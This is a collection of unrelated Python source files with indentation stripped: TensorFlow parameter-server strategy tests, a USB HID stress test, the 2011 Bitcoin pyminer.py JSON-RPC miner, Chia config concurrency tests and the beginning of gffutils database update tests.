return input_tensor + v, input_tensor - v
@def_function.function
def worker_fn(iterator):
return self.strategy.run(replica_fn, args=(next(iterator),))
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
@contextlib.contextmanager
def _assert_logs_usage_warning():
with self.assertLogs(level='WARNING') as logs:
yield
self.assertIn(
'A `tf.distribute.experimental.ParameterServerStrategy` method is '
'invoked without using `ClusterCoordinator.schedule`. If you are not '
'tracing a tf.function, this method is possibly executed on the '
'coordinator, which can be slow. To properly dispatch functions to '
'run on workers, methods like `run` or `reduce` should be used '
'within a function passed to `tf.distribute.experimental.coordinator.'
'ClusterCoordinator.schedule`.', logs.output[0])
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
# A proper `schedule` should succeed.
rv = self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with _assert_logs_usage_warning():
# Invoking `run` without `coordinator.schedule` again should result in a
# warning.
self.strategy.run(
replica_fn, args=(constant_op.constant(1, dtype=dtypes.int64),))
all_results = [(2, 0)] * self.strategy.num_replicas_in_sync
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append(all_results[i])
self.assertAllEqual(
tuple(expected_result),
self.strategy.experimental_local_results(rv.fetch()))
def testBasicVariableAssignment(self):
self.strategy.extended._variable_count = 0
with self.strategy.scope():
v1 = variables.Variable(initial_value=0.0)
v2 = variables.Variable(initial_value=1.0)
self.assertEqual(self.strategy.extended._variable_count, 2)
@def_function.function
def worker_fn():
v1.assign_add(0.1)
v2.assign_sub(0.2)
return v1.read_value() / v2.read_value()
results = self.coordinator.schedule(worker_fn)
logging.info('Results of experimental_run_v2: %f',
self.coordinator.fetch(results))
self.assertAlmostEqual(v1.read_value().numpy(), 0.1, delta=1e-6)
self.assertAlmostEqual(v2.read_value().numpy(), 0.8, delta=1e-6)
def testRunAndReduce(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
def testRunAndReduceWithAssignAdd(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(initial_value=1.)
v1 = variables.Variable(
initial_value=0.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
expected_result = (4. * self.strategy.num_replicas_in_sync,
2. * self.strategy.num_replicas_in_sync)
@def_function.function
def worker_fn(input_tensor):
def replica_fn(input_tensor):
# Within `replica_fn`, it has to be in a replica context.
self.assertFalse(
distribution_strategy_context.in_cross_replica_context())
v1.assign_add(input_tensor)
return input_tensor + v, input_tensor - v
run_result = self.strategy.run(replica_fn, args=(input_tensor,))
reduced_result = self.strategy.reduce('SUM', run_result, axis=None)
check_ops.assert_equal_v2(reduced_result, expected_result)
return reduced_result
# Asserting scheduling in scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertIsInstance(result, coordinator_lib.RemoteValue)
self.assertEqual(result.fetch(), expected_result)
# Asserting scheduling out of scope has the expected behavior.
result = self.coordinator.schedule(
worker_fn, args=(constant_op.constant(3.),))
self.assertEqual(result.fetch(), expected_result)
self.assertEqual(v1, 6.)
def testVariableAggregation(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.SUM)
@def_function.function
def worker_fn():
def replica_fn():
value = math_ops.cast(
distribution_strategy_context.get_replica_context()
.replica_id_in_sync_group + 1, v.dtype)
v.assign(value)
self.strategy.run(replica_fn)
self.coordinator.schedule(worker_fn)
self.coordinator.join()
expected_result = 0.
for i in range(self.strategy.num_replicas_in_sync):
expected_result = expected_result + i + 1
self.assertEqual(v, expected_result)
def testVariableCaching(self):
self.assertFalse(distribution_strategy_context.in_cross_replica_context())
with self.strategy.scope():
self.assertTrue(distribution_strategy_context.in_cross_replica_context())
v = variables.Variable(
initial_value=1.,
aggregation=variable_scope.VariableAggregation.ONLY_FIRST_REPLICA)
# Test read value inside caching scope
with distribute_utils.cache_variable_reads():
v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
self.assertEqual(v.read_value(), 1.0) # should be cached 1.0 value.
# Reset v to 2.0
v.assign(2.0)
# Test convert to tensor value inside caching scope
with distribute_utils.cache_variable_reads():
t = v * 3.0
self.assertEqual(t, 6.0)
v.assign(3.0)
t1 = v * 3.0
self.assertEqual(t1, 6.0) # should be cached 2.0 * 3.0 value.
# Reset v to 1.0
v.assign(1.0)
# Verify caching scope inside tf.function
@def_function.function
def worker_fn():
with distribute_utils.cache_variable_reads():
def replica_fn():
t = v.read_value() # Reads value 1.0
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return 1.0
return t # Should be 1.0 instead of 5.0
return self.strategy.run(replica_fn)
result = self.coordinator.schedule(worker_fn)
result = result.fetch()
expected_result = 1.
self.assertEqual(result, expected_result)
# Verify that v.read_value works as expected outside of scope.
v.assign(4.0)
self.assertEqual(v.read_value(), 4.0)
v.assign(constant_op.constant(2.0)) # v changes to 2.0
# Check with scope outside of tf function and check that cache is reset
@def_function.function
def worker_fn1():
def replica_fn():
t = v.read_value() # Reads value 2.0 ==> Should be cached
v.assign(constant_op.constant(5.0)) # v changes to 5.0
t = v.read_value() # should return cached value 2.0
return t # Should be 2.0 instead of 5.0
return self.strategy.run(replica_fn)
with distribute_utils.cache_variable_reads():
result = self.coordinator.schedule(worker_fn1)
result = result.fetch()
expected_result = 2.
self.assertEqual(result, expected_result)
# Verify scope nesting is not permitted.
with self.assertRaises(ValueError):
with distribute_utils.cache_variable_reads():
with distribute_utils.cache_variable_reads():
v.read_value()
@parameterized.parameters(True, False)
def testDistributedDatasetInsidePerWorkerDatasetFn(self, from_function):
if from_function:
def per_worker_dataset_fn():
dataset_fn = lambda _: dataset_ops.DatasetV2.range(1, 11).batch(4)
return self.strategy.distribute_datasets_from_function(dataset_fn)
else:
def per_worker_dataset_fn():
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return self.strategy.experimental_local_results(next(iterator))
per_worker_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(per_worker_dataset),))
result = result.fetch()
expected_result = array_ops.split(
math_ops.range(1., 5.),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(result, (expected_result))
@parameterized.parameters(True, False)
def testPassDistributedDatasetToCreatePerWorkerDataset(self, from_function):
if from_function:
dataset_fn = lambda _: dataset_ops.DatasetV2.range(1, 11).batch(4)
distributed_dataset = self.strategy.distribute_datasets_from_function(
dataset_fn)
else:
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
distributed_dataset = self.strategy.experimental_distribute_dataset(
dataset)
@def_function.function
def worker_fn(iterator):
return self.strategy.experimental_local_results(next(iterator))
per_worker_dataset = self.coordinator.create_per_worker_dataset(
distributed_dataset)
result = self.coordinator.schedule(
worker_fn, args=(iter(per_worker_dataset),))
result = result.fetch()
expected_result = array_ops.split(
math_ops.range(1., 5.),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(result, (expected_result))
def testDistributeDatasetsFromFunction(self):
def per_worker_dataset_fn():
def input_worker_device_fn(input_context):
self.assertIsNotNone(input_context)
return dataset_ops.DatasetV2.range(1, 11).batch(1)
return self.strategy.distribute_datasets_from_function(
input_worker_device_fn)
@def_function.function
def worker_fn(iterator):
result = self.strategy.experimental_local_results(next(iterator))
return result
distributed_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = result.fetch()
expected_result = []
for i in range(self.strategy.num_replicas_in_sync):
expected_result.append([1 + i])
self.assertAllEqual(result, expected_result)
def testAsyncScheduleWithDistributedDataset(self):
def input_fn():
dataset = dataset_ops.DatasetV2.from_tensor_slices([2.]).repeat().batch(
self.strategy.num_replicas_in_sync)
return self.strategy.experimental_distribute_dataset(dataset)
with self.strategy.scope():
v = variables.Variable(initial_value=[0], dtype=dtypes.float32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
# Reduce to convert PerReplica values to single value
reduced_value = self.strategy.reduce('MEAN', x, axis=None)
v.assign_add(reduced_value)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertAllEqual(v.read_value(), (0,))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
# With 5 addition it should be 2*5 = 10.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[10]]))
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertAllEqual(
self.strategy.experimental_local_results(v.read_value()), ([[20]]))
def testInputFunctionWithMapWithDistributedDataset(self):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
dataset = dataset_ops.DatasetV2.range(0, 10).batch(
self.strategy.num_replicas_in_sync).map(map_fn)
return self.strategy.experimental_distribute_dataset(dataset)
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
expected_result = array_ops.split(
math_ops.range(10., 10. + self.strategy.num_replicas_in_sync),
num_or_size_splits=self.strategy.num_replicas_in_sync,
axis=0)
self.assertAllEqual(
self.strategy.experimental_local_results(result.fetch()),
tuple(expected_result))
self.assertEqual(self._map_fn_tracing_count, 1)
def testPerWorkerDistributeDatasetsElementSpec(self):
def per_worker_dataset_fn():
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.from_tensor_slices([1, 2]))
dataset = dataset_ops.DatasetV2.from_tensor_slices([1, 2])
per_worker_distribute_dataset = self.coordinator.create_per_worker_dataset(
per_worker_dataset_fn)
self.assertAllEqual(
# Converts to PerReplicaSpec when num_replicas_in_sync are > 1
input_lib._create_distributed_tensor_spec(self.strategy,
dataset.element_spec),
per_worker_distribute_dataset.element_spec)
def testPerWorkerDistributedIteratorTypeSpec(self):
self._tracing_count = 0
def per_worker_dataset_fn():
self._tracing_count += 1
return self.strategy.distribute_datasets_from_function(
lambda _: dataset_ops.DatasetV2.range(1, 2))
@def_function.function
def worker_fn(iterator):
return next(iterator)
distributed_iterator = iter(
self.coordinator.create_per_worker_dataset(per_worker_dataset_fn))
worker_fn.get_concrete_function(distributed_iterator)
self.coordinator.schedule(worker_fn, args=(distributed_iterator,))
self.assertEqual(self._tracing_count, 1)
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
usbhid_test.py
|
from usbhid import usbhid
import sys
import threading
import time
import random
hid = usbhid()
ret = hid.open(0x084B,0x4853)
if ret != True:
sys.exit(-1)
# hid.disp_info()
# hid.set_debug_level(1)
# hid.
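# Sends `data` to the device as a sequence of 64-byte feature reports, zero-padding
# the final chunk (e.g. 292 bytes go out as four full reports plus one padded one).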
def hid_write(data):
block_size = 64
total_length = len(data)
offset = 0
length = total_length
__data = [0] * 64
while length > block_size:
__data[0:block_size] = data[offset:offset + block_size]
hid.setfeature(__data)
length -= block_size
offset += block_size
__data = [0] * 64
if length != 0:
__data[0:0+length] = data[offset:offset + length]
hid.setfeature(__data)
def hid_read():
data = []
for i in range(5):
__data = hid.getfeature(64)
data.extend(__data)
return data
# -------------------------------------------
def disp_hid_info():
print("thread %s is start" % threading.current_thread().name)
while True:
print('')
hid.disp_info()
delay_ms = random.uniform(0,5.0)
print('Waiting {0:0.2f}s before issuing the next command'.format(delay_ms))
time.sleep(delay_ms)
# break
print("thread %s is end" % threading.current_thread().name)
# --------------
def feature_test():
print("thread %s is start" % threading.current_thread().name)
data = []
for i in range(292):
data.append(i)
while True:
print('.',end='',flush=True)
hid_write(data)
hid_read()
# break
print("thread %s is end" % threading.current_thread().name)
# -------------------------------------------
print("thread %s is start" % threading.current_thread().name)
t1 = threading.Thread(target=disp_hid_info, name='disp_hid_info')
t2 = threading.Thread(target=feature_test, name='feature_test')
t1.start()
t2.start()
t1.join()
t2.join()
print("thread %s is end" % threading.current_thread().name)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
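# Byte-order helpers used on the getwork data and the resulting hashes: uint32
# masks to 32 bits, bytereverse flips the bytes of one 32-bit word, bufreverse
# applies that flip to every word in a buffer, and wordreverse reverses the order
# of the 32-bit words.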
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
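# Illustrative sketch (not part of the original miner): how Miner.work() below
# reuses a partially-updated SHA-256 object. The 76 static header bytes are
# hashed once up front; each candidate nonce then only costs a copy of that
# state, the 4-byte little-endian nonce, and a second SHA-256 pass.
def finish_header_hash(static_hash, nonce):
    h = static_hash.copy()
    h.update(struct.pack("<I", nonce))
    return hashlib.sha256(h.digest()).digest()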
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 23472
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from chia.util.config import create_default_chia_config, initial_config_file, load_config, save_config
from chia.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aid in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
    Spin off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
    Subprocess entry point. This function spins off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_chia_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_chia_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_chia_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_chia_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_chia_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 55401
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
        Access to config.yaml isn't currently synchronized, so the best we can hope for is that
        the file contents are written as a whole.
"""
        # Artificially inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
        # Spin off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
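# Illustrative sketch (not part of the Chia test suite): the kind of atomic
# write-and-replace that avoids the partial-read problem exercised above.
# Readers see either the old file or the new one, never a half-written mix.
# The helper name and the use of yaml.safe_dump here are assumptions, not
# chia's actual save_config() implementation.
def atomic_write_yaml(path: Path, data: Dict) -> None:
    import os
    import tempfile
    fd, tmp_path = tempfile.mkstemp(dir=str(path.parent))
    try:
        with os.fdopen(fd, "w") as tmp:
            yaml.safe_dump(data, tmp)
        os.replace(tmp_path, str(path))  # atomic rename onto the target
    except BaseException:
        os.unlink(tmp_path)
        raise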
|
test.py
|
import warnings
from textwrap import dedent
from . import expected
from gffutils import example_filename, create, parser, feature
import gffutils
import gffutils.helpers as helpers
import gffutils.gffwriter as gffwriter
import gffutils.inspect as inspect
import gffutils.iterators as iterators
import sys
import os
import six
import shutil
import threading
import tempfile
from textwrap import dedent
from nose.tools import assert_raises
from six.moves import SimpleHTTPServer
if sys.version_info.major == 3:
import socketserver as SocketServer
else:
import SocketServer
import multiprocessing
import json
import tempfile
import shutil
import glob
import difflib
testdbfn_gtf = ':memory:'
testdbfn_gff = ':memory:'
fn = gffutils.example_filename('FBgn0031208.gtf')
def make_db(i):
"""
Module-level function that can be pickled across processes for
multiprocessing testing.
"""
gffutils.create_db(fn, ':memory:', _keep_tempfiles='.%s' % i)
return i
def test_update():
# check both in-memory and file-based dbs
db = create.create_db(
example_filename('FBgn0031208.gff'), ':memory:', verbose=False,
keep_order=True,
force=True)
orig_num_features = len(list(db.all_features()))
f = feature.feature_from_line(
'chr2L . testing 1 10 . + . ID=testing_feature;n=1',
dialect=db.dialect, strict=False)
# no merge strategy required because we're adding a new feature
db.update([f])
x = list(db.features_of_type('testing'))
assert len(x) == 1
x = x[0]
x.keep_order = True
assert str(x) == "chr2L . testing 1 10 . + . ID=testing_feature;n=1", str(x)
# ought to be one more now . . .
num_features = len(list(db.all_features()))
assert num_features == orig_num_features + 1, num_features
# Now try updating with the same feature, but using merge_strategy="merge",
# which appends items to attributes ( n=1 --> n=1,2 )
f = feature.feature_from_line(
'chr2L . testing 1 10 . + . ID=testing_feature;n=1',
dialect=db.dialect, strict=False)
f.keep_order = True
f.attributes['n'] = ['2']
db.update([f], merge_strategy='merge')
x = list(db.features_of_type('testing'))
assert len(x) == 1
# Merging does a list(set()) operation, so the order is not guaranteed.
# Fix it here for testing...
x = x[0]
x.attributes['n'].sort()
assert str(x) == "chr2L . testing 1 10 . + . ID=testing_feature;n=1,2", str(x)
# still should have the same number of features as before (still 2)
num_features = len(list(db.all_features()))
assert num_features == orig_num_features + 1, num_features
# Merging while iterating. e.g., if you're updating children with gene
# IDs.
db = create.create_db(example_filename('FBgn0031208.gff'), ':memory:',
verbose=False, force=True, keep_order=True)
def gen():
for gene in db.features_of_type('gene'):
for child in list(db.children(gene)):
# important: the FBgn0031208.gff file was designed to have some
# funky features: there are two exons without ID attributes. These
# are assigned to ids "exon_1" and "exon_2". Upon update, with
# still no ID, we then have two new features "exon_3" and "exon_4".
# To prevent this issue, we ensure that the ID attribute exists...
child.attributes['gene_id'] = [gene.id]
if 'ID' not in child.attributes:
child.attributes['ID'] = [child.id]
yield child
db.update(gen(), merge_strategy='replace')
print("\n\nafter\n\n")
for child in db.children('FBgn0031208'):
print(child.id)
assert child.attributes['gene_id'] == ['FBgn0031208'], (child, child.attributes)
num_entries = 0
for gene_recs in list(db.iter_by_parent_childs()):
# Add attribute to each gene record
rec = gene_recs[0]
rec.attributes["new"] = ["new_value"]
